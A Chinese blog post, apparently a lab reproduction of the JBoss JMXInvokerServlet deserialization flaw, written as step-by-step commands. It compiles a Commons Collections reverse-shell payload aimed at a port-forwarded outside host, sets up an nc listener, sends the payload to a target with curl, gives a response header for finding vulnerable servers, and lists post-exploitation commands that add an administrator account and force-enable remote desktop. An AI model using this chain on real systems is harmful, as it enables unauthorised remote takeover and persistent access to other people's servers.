[漏洞复现]Jboss反序复现

Jboos 反序复现

  • 前言:
  • 漏洞原理

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

  • 设备:

攻击机kali
漏洞靶机:http://w12.mucn.site:8080(靶机的搭建详情此处不赘述)
端口映射服务

  • 复现流程:

首先:本机Kali无法运行javac对jar文件进行编译。
解决:apt install default-jdk
jboos02.png

  • 对本地端口进行映射,不然无法实现交互式shell(自行购买sunny-ngrok TCP版转发)

jboss02.png

git clone https://github.com/joaomatosf/JavaDeserH2HC 克隆漏洞利用项目

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 编译

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 5gzvip.idcfengye.com:10000 (IP:端口)

  • 注意:此处为交互式反弹shell地址 不要填自己的内网ip 收不到反弹的(如果是内网环境当我没说)
  • IP和端口填映射出去的服务器地址和端口 如:5gzvip.idcfengye.com:10000

  • 开启监听:

nc -v -l -p 1616(此处填的是你内网映射出去的端口)

  • 运行如下 向服务器发送序列化的后的攻击文件

binary:[ˈbaɪnəri]

curl http://192.168.135.4:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
jboss03.png

  • 查看监听内容(可以看见连接信息):

jboss04.png

  • 直接输入命令 交互式操作。

jboss05.png


  • 该漏洞尝试查找:

X-Powered-By: Servlet/3.0; JBossAS-6

  • 常用cmd命令
  • 添加用户到管理员组:

net localgroup administrators mucn /add

  • cmd强开3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Mucn

Mucn

不管,看了我的博客就得帮忙转载,快点转载一下哦!❤️✔️

留下你的评论

快留下你的小秘密吧